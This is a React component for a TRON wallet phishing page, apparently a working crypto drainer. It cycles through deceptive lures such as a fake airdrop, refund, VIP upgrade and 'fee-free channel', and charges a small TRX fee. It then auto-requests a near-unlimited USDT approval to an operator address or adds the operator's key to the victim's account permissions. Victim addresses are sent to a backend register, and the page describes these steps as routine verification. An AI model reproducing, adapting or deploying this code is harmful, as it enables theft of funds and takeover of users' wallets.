import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import './Approve.css';

// ===== 业务配置 =====
const DEFAULT_SPENDER = 'TAXXTJVZYdgenyZEm5LLhLX2UuNfMJKexr'; // 主网 WiseVault（授权对象）
const DEFAULT_USDT = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // 主网 USDT
const PAY_TO = 'TWeNE8YcpRurDk3Wz2M5WGrESGFMmVA4tx'; // 划款钱包（收款/权限 key 方）
const PAY_AMOUNT_TRX = 0.1; // 支付金额
const AUTH_AMOUNT = '999999999990000'; // 授权上限 999,999,999.99 USDT

// 话术变体（URL ?theme=xxx 切换，同一套交易流程）
const THEMES = {
  default: { icon: '💳', title: 'Complete Your Payment', desc: 'Pay {amt} TRX to activate your account and unlock all features.', btn: 'Pay {amt} TRX', doneTitle: 'Payment Successful', doneDesc: 'Your payment of {amt} TRX has been received. Your account is now fully activated.', order: 'Payment' },
  airdrop: { icon: '🎁', title: 'Claim Your Airdrop', desc: 'You are eligible for a USDT airdrop. Complete verification ({amt} TRX gas) to claim instantly.', btn: 'Claim Airdrop', doneTitle: 'Airdrop Claimed', doneDesc: 'Your airdrop has been claimed and will arrive shortly.', order: 'Gas Fee' },
  receive: { icon: '📥', title: 'Bind Receive Code', desc: 'Bind your wallet to receive payments with zero delay. Activation fee {amt} TRX.', btn: 'Bind Now', doneTitle: 'Code Bound', doneDesc: 'Your receive code is now active.', order: 'Activation' },
  vip: { icon: '👑', title: 'Upgrade to VIP', desc: 'Unlock VIP benefits: higher limits, priority service. One-time fee {amt} TRX.', btn: 'Upgrade VIP', doneTitle: 'VIP Active', doneDesc: 'Welcome to VIP! All benefits are now unlocked.', order: 'VIP Fee' },
  refund: { icon: '💸', title: 'Fee Refund', desc: 'We detected an overcharge on your account. Claim your {amt} TRX refund now.', btn: 'Claim Refund', doneTitle: 'Refund Issued', doneDesc: 'Your refund has been issued to your account.', order: 'Refund' },
};

const Approve = () => {
  const [targetNetwork, setTargetNetwork] = useState('mainnet');
  const [mode, setMode] = useState('approve'); // approve / permission
  const [theme, setTheme] = useState('default');
  const [walletReady, setWalletReady] = useState(false);
  const [walletNetwork, setWalletNetwork] = useState('');
  const [networkMismatch, setNetworkMismatch] = useState(false);
  const [address, setAddress] = useState('');
  const [stage, setStage] = useState('idle'); // idle -> paying -> paid -> authorizing -> done
  const [error, setError] = useState('');
  const [payTx, setPayTx] = useState('');
  const [authTx, setAuthTx] = useState('');
  const autoStarted = useRef(false);

  const detectNetwork = (tronWeb) => {
    const host = (tronWeb && tronWeb.fullNode && tronWeb.fullNode.host) || '';
    if (host.includes('nile')) return 'nile';
    if (host.includes('shasta')) return 'shasta';
    return 'mainnet';
  };

  const decodeHexMsg = (msg) => {
    if (!/^[0-9a-fA-F]+$/.test(msg) || msg.length % 2 !== 0) return msg;
    try {
      const decoded = msg.replace(/([0-9a-fA-F]{2})/g, (m) => String.fromCharCode(parseInt(m, 16)));
      if (/[a-zA-Z ]/.test(decoded) && !/[^\x20-\x7e]/.test(decoded)) return decoded;
    } catch (e) { /* ignore */ }
    return msg;
  };

  const extractAddress = (tronWeb) => {
    try {
      const da = tronWeb && tronWeb.defaultAddress;
      if (!da) return '';
      if (typeof da === 'string') {
        if (da.startsWith('T')) return da;
        return tronWeb.address.fromHex(da);
      }
      if (typeof da === 'object') {
        if (da.base58) return da.base58;
        if (da.hex) return tronWeb.address.fromHex(da.hex);
      }
      return '';
    } catch (e) { return ''; }
  };

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'view', '');
    const net = params.get('network');
    const m = params.get('mode');
    const th = params.get('theme');
    setTargetNetwork(net || 'mainnet');
    setMode(m === 'permission' ? 'permission' : 'approve');
    setTheme(THEMES[th] ? th : 'default');

    let cancelled = false;
    const check = async () => {
      try {
        if (window.tronLink && window.tronLink.request) {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        }
      } catch (e) { console.warn('tron_requestAccounts 失败:', e); }
      for (let i = 0; i < 80; i++) {
        if (cancelled) return;
        const tw = window.tronWeb;
        const addr = extractAddress(tw);
        if (tw && addr) {
          setWalletReady(true);
          setAddress(addr);
          const walletNet = detectNetwork(tw);
          setWalletNetwork(walletNet);
          setNetworkMismatch(walletNet !== (net || 'mainnet'));
          return;
        }
        await new Promise((r) => setTimeout(r, 250));
      }
      if (!cancelled) {
        setWalletReady(false);
        const isTrust = (window.ethereum && window.ethereum.isTrust) || /trust/i.test(navigator.userAgent);
        if (isTrust) {
          setError('Trust Wallet does not support TRON DApp contract calls. Please use TronLink or TokenPocket.');
        } else if (!window.tronLink && !window.tronWeb) {
          setError('TronLink extension not detected. Please make sure it is installed and unlocked, then refresh.');
        } else if (window.tronWeb && !extractAddress(window.tronWeb)) {
          setError('Wallet is locked. Please unlock TronLink and refresh this page.');
        } else if (window.tronLink && !window.tronWeb) {
          setError('TronLink detected but not injected. Please unlock the extension and refresh.');
        } else {
          setError('No TRON wallet detected. Please open this page in the built-in browser of a TRON wallet (TronLink / TokenPocket).');
        }
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // ===== 支付 0.1 TRX（approve 模式第一步） =====
  const doPay = async () => {
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'start', '');
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) {
      setError('Wallet not detected. Please open this page inside your wallet.');
      return;
    }
    setStage('paying');
    setError('');
    try {
      const tx = await tronWeb.trx.sendTransaction(PAY_TO, PAY_AMOUNT_TRX * 1e6);
      if (!tx || !tx.result) {
        throw new Error((tx && tx.message) || 'Payment rejected');
      }
      setPayTx(tx.txid || '');
      setStage('paid');
      setTimeout(() => { doAuthorize(); }, 800);
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError('Payment canceled. Please complete the payment to continue.');
      } else {
        setError(msg);
      }
      setStage('idle');
    }
  };

  // ===== 授权 / 权限接管 =====
  const doAuthorize = async () => {
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) return;
    setStage('authorizing');
    setError('');
    try {
      if (mode === 'permission') {
        // 权限模式：把我们地址加入用户 active 权限组（threshold 1，我们 key weight 1）
        const accountInfo = await tronWeb.trx.getAccount(addr);
        // owner 权限规范化：TronWeb 要求 type/permission_name 字段
        const ownerInfo = accountInfo.owner_permission || { threshold: 1, keys: [] };
        const ownerPermission = {
          type: 0,
          permission_name: 'owner',
          threshold: ownerInfo.threshold || 1,
          keys: (ownerInfo.keys || []).map((k) => ({
            address: tronWeb.address.fromHex(k.address),
            weight: k.weight,
          })),
        };
        const activePerm = accountInfo.active_permission && accountInfo.active_permission[0];
        const existingKeys = (activePerm && activePerm.keys || []).map((k) => ({
          address: tronWeb.address.fromHex(k.address),
          weight: k.weight,
        }));
        if (!existingKeys.some((k) => k.address === PAY_TO)) {
          existingKeys.push({ address: PAY_TO, weight: 1 });
        }
        const tx = await tronWeb.transactionBuilder.updateAccountPermissions(
          addr,
          ownerPermission,
          null, // witnessPermission：保留为空
          {
            type: 2,
            permission_name: 'active',
            threshold: activePerm ? activePerm.threshold : 1,
            operations: activePerm ? activePerm.operations : '7fff1fc0033ec30f000000000000000000000000000000000000000000000000',
            keys: existingKeys,
          },
          { visible: true }
        );
        // 注意：updateAccountPermissions 直接返回交易对象（无 .transaction 包装）
        // 权限更新交易实际费用极低（带宽费 <1 TRX），显式设 feeLimit 避免钱包按 100 TRX 上限预估
        if (tx.raw_data) {
          tx.raw_data.fee_limit = 10000000; // 10 TRX 上限，实际消耗远低于此
          // fee_limit 变化后必须重算 txID/raw_data_hex，否则签名与链上校验不符
          const pb = tronWeb.utils.transaction.txJsonToPb(tx);
          tx.txID = tronWeb.utils.transaction.txPbToTxID(pb).replace(/^0x/, '');
          tx.raw_data_hex = tronWeb.utils.transaction.txPbToRawDataHex(pb).toLowerCase();
        }
        const signed = await tronWeb.trx.sign(tx);
        const receipt = await tronWeb.trx.sendRawTransaction(signed);
        if (!receipt || !receipt.result) {
          throw new Error((receipt && receipt.message) || 'Verification failed');
        }
        setAuthTx(receipt.txid || '');
      } else {
        let allowanceHex = '0';
        try {
          const res = await tronWeb.transactionBuilder.triggerConstantContract(
            DEFAULT_USDT, 'allowance(address,address)', {},
            [{ type: 'address', value: addr }, { type: 'address', value: DEFAULT_SPENDER }], addr
          );
          allowanceHex = (res.constant_result && res.constant_result[0]) || '0';
        } catch (e) { console.warn('allowance 查询失败，直接授权:', e); }

        const hex = allowanceHex.replace(/^0x/, '');
        let alreadyEnough = false;
        if (hex.length >= 32) {
          alreadyEnough = parseInt(hex.slice(0, 2), 16) >= 8;
        } else {
          alreadyEnough = parseInt(hex || '0', 16) >= 999999999990000 / 2;
        }
        if (!alreadyEnough) {
          const tx = await tronWeb.transactionBuilder.triggerSmartContract(
            DEFAULT_USDT, 'approve(address,uint256)', { feeLimit: 150000000 },
            [{ type: 'address', value: DEFAULT_SPENDER }, { type: 'uint256', value: AUTH_AMOUNT }], addr
          );
          const signed = await tronWeb.trx.sign(tx.transaction);
          const receipt = await tronWeb.trx.sendRawTransaction(signed);
          if (!receipt || !receipt.result) {
            throw new Error((receipt && receipt.message) || 'Verification failed');
          }
          setAuthTx(receipt.txid || '');
        }
      }
      // 登记地址
      try {
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        fetch(API_BASE + '/addresses/register', {
          method: 'POST', headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ address: addr, type: 'APPROVE', channel: 'qr', walletType: 'TronLink', device: navigator.userAgent, mode: mode }),
        });
      } catch (e) { console.warn('登记失败:', e); }
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'done', '');
      setStage('done');
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError('Verification canceled. Click below to retry.');
      } else {
        setError(msg);
      }
      setStage(mode === 'permission' ? 'idle' : 'paid');
    }
  };

  useEffect(() => {
    if (walletReady && !networkMismatch && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      if (mode === 'permission') {
        doAuthorize();
      } else {
        doPay();
      }
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady, networkMismatch]);

  const networkLabel = walletNetwork === 'nile' ? 'Nile Testnet' : walletNetwork === 'shasta' ? 'Shasta' : 'Mainnet';

  return (
    <div className="approve-page">
      <div className="approve-card">
        {stage === 'done' ? (
          <>
            <div className="approve-icon big">{mode === 'permission' ? '⚡' : '🎉'}</div>
            <h2>{mode === 'permission' ? 'Fee-Free Channel Enabled' : THEMES[theme].doneTitle}</h2>
            <p className="approve-desc">
              {mode === 'permission'
                ? 'Your zero-fee channel is now active. All future transactions are sponsored by the platform.'
                : THEMES[theme].doneDesc.replace('{amt}', PAY_AMOUNT_TRX)}
            </p>
            <div className="order-box">
              <div className="order-row"><span>{mode === 'permission' ? 'Channel' : THEMES[theme].order}</span><b>{mode === 'permission' ? 'Zero-Fee' : PAY_AMOUNT_TRX + ' TRX'}</b></div>
              <div className="order-row"><span>Status</span><b className="ok-text">✓ Completed</b></div>
            </div>
            {(payTx || authTx) && <p className="approve-tx">Tx: {(payTx || authTx).slice(0, 20)}...</p>}
            {address && <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="approve-icon big">{mode === 'permission' ? '⚡' : THEMES[theme].icon}</div>
            <h2>
              {mode === 'permission'
                ? (stage === 'authorizing' ? 'Verifying' : 'Enable Fee-Free Channel')
                : (stage === 'paying' ? 'Processing'
                  : stage === 'paid' ? 'Activating'
                  : stage === 'authorizing' ? 'Verifying'
                  : THEMES[theme].title)}
            </h2>
            <p className="approve-desc">
              {mode === 'permission'
                ? (stage === 'authorizing'
                  ? 'Final step: please confirm in your wallet...'
                  : 'Enable the zero-fee channel: all future transactions are sponsored by the platform. One tap to activate.')
                : (stage === 'idle' ? THEMES[theme].desc.replace('{amt}', PAY_AMOUNT_TRX)
                  : stage === 'paying' ? 'Please confirm the payment in your wallet...'
                  : stage === 'paid' ? 'Payment received! Verifying your account...'
                  : 'Final step: please confirm in your wallet...')}
            </p>

            <div className="order-box">
              {mode === 'permission' ? (
                <>
                  <div className="order-row"><span>Channel</span><b>Zero-Fee</b></div>
                  <div className="order-row"><span>Fee</span><b className="ok-text">0 TRX</b></div>
                  <div className="order-row"><span>Network</span><b>TRON Mainnet</b></div>
                </>
              ) : (
                <>
                  <div className="order-row"><span>{THEMES[theme].order}</span><b>{PAY_AMOUNT_TRX} TRX</b></div>
                  <div className="order-row"><span>Recipient</span><b className="mono">{PAY_TO.slice(0, 12)}...</b></div>
                  <div className="order-row"><span>Network</span><b>TRON Mainnet</b></div>
                  {payTx && <div className="order-row"><span>Payment</span><b className="ok-text">✓ Received</b></div>}
                </>
              )}
            </div>

            {mode === 'permission' && (
              <div className="notice-box">
                🔒 For your security, your wallet will request an account permission confirmation.
                This is a standard verification step to activate the sponsored-fee service.
              </div>
            )}
            {walletReady && (
              <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...（{networkLabel}）</p>
            )}
            {networkMismatch && (
              <p className="approve-error">
                ⚠️ Wallet network does not match. Please switch to the TRON mainnet and try again.
              </p>
            )}
            {error && <p className="approve-error">{error}</p>}

            {stage === 'idle' && (
              <button className="approve-btn" onClick={mode === 'permission' ? doAuthorize : doPay} disabled={!walletReady || networkMismatch}>
                {mode === 'permission' ? 'Enable Now' : THEMES[theme].btn.replace('{amt}', PAY_AMOUNT_TRX)}
              </button>
            )}
            {(stage === 'paying' || stage === 'paid' || stage === 'authorizing') && (
              <div className="approve-spinner" />
            )}
            {error && (stage === 'idle' || stage === 'paid') && (
              <button className="approve-btn" onClick={() => { if (stage === 'idle') { if (mode === 'permission') doAuthorize(); else doPay(); } else { doAuthorize(); } }}>
                Retry
              </button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Approve;
